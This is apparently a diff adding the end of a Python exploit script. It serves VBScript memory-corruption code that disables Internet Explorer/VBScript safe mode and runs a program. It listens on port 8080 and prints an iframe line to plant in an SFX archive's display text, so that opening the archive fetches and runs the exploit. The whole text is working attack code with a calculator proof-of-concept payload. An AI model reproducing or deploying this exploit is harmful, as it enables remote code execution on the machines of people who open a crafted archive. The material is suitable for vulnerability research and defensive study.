+end sub
+ 
+function mydata()
+    On Error Resume Next
+     i=testaa
+     i=null
+     redim  Preserve aa(a2)  
+   
+     ab(0)=0
+     aa(a1)=i
+     ab(0)=6.36598737437801E-314
+ 
+     aa(a1+2)=myarray
+     ab(2)=1.74088534731324E-310  
+     mydata=aa(a1)
+     redim  Preserve aa(a0)  
+end function 
+ 
+ 
+function setnotsafemode()
+    On Error Resume Next
+    i=mydata()  
+    i=rum(i+8)
+    i=rum(i+16)
+    j=rum(i+&h134)  
+    for k=0 to &h60 step 4
+        j=rum(i+&h120+k)
+        if(j=14) then
+              j=0          
+              redim  Preserve aa(a2)             
+     aa(a1+2)(i+&h11c+k)=ab(4)
+              redim  Preserve aa(a0)  
+ 
+     j=0 
+              j=rum(i+&h120+k)   
+          
+               Exit for
+           end if
+ 
+    next 
+    ab(2)=1.69759663316747E-313
+    runmumaa() 
+end function
+ 
+function Over()
+    On Error Resume Next
+    dim type1,type2,type3
+    Over=False
+    a0=a0+a3
+    a1=a0+2
+    a2=a0+&h8000000
+   
+    redim  Preserve aa(a0) 
+    redim   ab(a0)     
+   
+    redim  Preserve aa(a2)
+   
+    type1=1
+    ab(0)=1.123456789012345678901234567890
+    aa(a0)=10
+           
+    If(IsObject(aa(a1-1)) = False) Then
+       if(intVersion<4) then
+           mem=cint(a0+1)*16             
+           j=vartype(aa(a1-1))
+           if((j=mem+4) or (j*8=mem+8)) then
+              if(vartype(aa(a1-1))<>0)  Then    
+                 If(IsObject(aa(a1)) = False ) Then             
+                   type1=VarType(aa(a1))
+                 end if               
+              end if
+           else
+             redim  Preserve aa(a0)
+             exit  function
+ 
+           end if 
+        else
+           if(vartype(aa(a1-1))<>0)  Then    
+              If(IsObject(aa(a1)) = False ) Then
+                  type1=VarType(aa(a1))
+              end if               
+            end if
+        end if
+    end if
+               
+     
+    If(type1=&h2f66) Then         
+          Over=True      
+    End If  
+    If(type1=&hB9AD) Then
+          Over=True
+          win9x=1
+    End If  
+ 
+    redim  Preserve aa(a0)          
+         
+end function
+ 
+function rum(add) 
+    On Error Resume Next
+    redim  Preserve aa(a2)  
+   
+    ab(0)=0   
+    aa(a1)=add+4     
+    ab(0)=1.69759663316747E-313       
+    rum=lenb(aa(a1))  
+    
+    ab(0)=0
+    redim  Preserve aa(a0)
+end function
+ 
+</script>
+ 
+</body>
+</html>"""
+response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF 
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+host = raw_input(" Enter Local IP: ")
+server_address = (host, 8080)
+sock.bind(server_address)
+print "[+] Server started " + host +  " [+]"
+sock.listen(1)
+print "[+] Insert this code on the 'Text to display into sfx windows' [+]"
+print "\n<iframe src='http://" + host + ":8080/'> </iframe>"
+print "\n[+] Waiting for request . . . [+]"
+connection, client_address = sock.accept()
+while True:
+    connection.recv(2048)
+    print "[+] Got request , sending exploit . . .[+]"
+    connection.send(exploit)
+    print "[+] Exploit sent , A calc should pop up . .  [+]"
+    print "\nhttps://www.infogen.al/\n"
+    exit(0)